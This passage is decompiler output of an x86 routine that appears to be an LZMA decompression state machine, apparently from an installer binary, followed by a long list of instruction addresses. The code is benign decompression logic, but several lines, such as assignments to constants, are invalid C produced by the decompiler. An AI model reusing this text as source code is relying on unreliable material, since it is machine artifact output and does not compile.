												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														__ebx = __edx + 1;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                      0x00000000
                                                                      0x00406b79
                                                                      0x00406b79
                                                                      0x00406b7d
                                                                      0x00406b9e
                                                                      0x00406ba5
                                                                      0x00406bab
                                                                      0x00406bb1
                                                                      0x00406bc3
                                                                      0x00406bc9
                                                                      0x00406bce
                                                                      0x00000000
                                                                      0x00406b7f
                                                                      0x00406b85
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f4f
                                                                      0x00406f55
                                                                      0x00406f5b
                                                                      0x00406f75
                                                                      0x00406f78
                                                                      0x00406f7e
                                                                      0x00406f89
                                                                      0x00406f8b
                                                                      0x00406f5d
                                                                      0x00406f5d
                                                                      0x00406f6c
                                                                      0x00406f70
                                                                      0x00406f70
                                                                      0x00406f95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f97
                                                                      0x00406f9b
                                                                      0x0040714a
                                                                      0x00407160
                                                                      0x00407168
                                                                      0x0040716f
                                                                      0x00407171
                                                                      0x00407178
                                                                      0x0040717c
                                                                      0x0040717c
                                                                      0x00406fa7
                                                                      0x00406fae
                                                                      0x00406fb6
                                                                      0x00406fb9
                                                                      0x00406fbc
                                                                      0x00406fbc
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x00406767
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00000000
                                                                      0x00406778
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406781
                                                                      0x00406784
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406791
                                                                      0x00406794
                                                                      0x00406796
                                                                      0x00406797
                                                                      0x0040679a
                                                                      0x0040679c
                                                                      0x0040679d
                                                                      0x0040679f
                                                                      0x004067a2
                                                                      0x004067a7
                                                                      0x004067ac
                                                                      0x004067b5
                                                                      0x004067c8
                                                                      0x004067cb
                                                                      0x004067d7
                                                                      0x004067ff
                                                                      0x00406801
                                                                      0x0040680f
                                                                      0x0040680f
                                                                      0x00406813
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x00406803
                                                                      0x00406806
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x004067dd
                                                                      0x004067e2
                                                                      0x004067e2
                                                                      0x004067eb
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x00406819
                                                                      0x00406819
                                                                      0x0040681d
                                                                      0x004070c9
                                                                      0x00000000
                                                                      0x004070c9
                                                                      0x00406826
                                                                      0x00406836
                                                                      0x00406839
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683f
                                                                      0x00406843
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406845
                                                                      0x0040684b
                                                                      0x00406875
                                                                      0x0040687b
                                                                      0x00406882
                                                                      0x00000000
                                                                      0x00406882
                                                                      0x00406851
                                                                      0x00406854
                                                                      0x00406859
                                                                      0x00406859
                                                                      0x00406864
                                                                      0x0040686c
                                                                      0x0040686f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068b4
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068ca
                                                                      0x004068d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406889
                                                                      0x00406889
                                                                      0x0040688d
                                                                      0x004070d8
                                                                      0x00000000
                                                                      0x004070d8
                                                                      0x00406899
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a7
                                                                      0x004068aa
                                                                      0x004068ad
                                                                      0x004068b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f4f
                                                                      0x00406f55
                                                                      0x00406f5b
                                                                      0x00406f75
                                                                      0x00406f78
                                                                      0x00406f7e
                                                                      0x00406f89
                                                                      0x00406f8b
                                                                      0x00406f5d
                                                                      0x00406f5d
                                                                      0x00406f6c
                                                                      0x00406f70
                                                                      0x00406f70
                                                                      0x00406f95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068da
                                                                      0x004068dc
                                                                      0x004068df
                                                                      0x00406950
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695d
                                                                      0x00406967
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x004068e1
                                                                      0x004068e5
                                                                      0x004068e8
                                                                      0x004068ea
                                                                      0x004068ed
                                                                      0x004068f0
                                                                      0x004068f2
                                                                      0x004068f5
                                                                      0x004068f7
                                                                      0x004068fc
                                                                      0x004068ff
                                                                      0x00406902
                                                                      0x00406906
                                                                      0x0040690d
                                                                      0x00406910
                                                                      0x00406917
                                                                      0x0040691b
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406927
                                                                      0x0040692a
                                                                      0x00406948
                                                                      0x0040694a
                                                                      0x00000000
                                                                      0x0040692c
                                                                      0x0040692c
                                                                      0x0040692f
                                                                      0x00406932
                                                                      0x00406935
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x0040693a
                                                                      0x0040693d
                                                                      0x0040693f
                                                                      0x00406940
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406be3
                                                                      0x00406be7
                                                                      0x00406c0a
                                                                      0x00406c0d
                                                                      0x00406c10
                                                                      0x00406c1a
                                                                      0x00406be9
                                                                      0x00406be9
                                                                      0x00406bec
                                                                      0x00406bef
                                                                      0x00406bf2
                                                                      0x00406bff
                                                                      0x00406c02
                                                                      0x00406c02
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406c26
                                                                      0x00406c2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c30
                                                                      0x00406c34
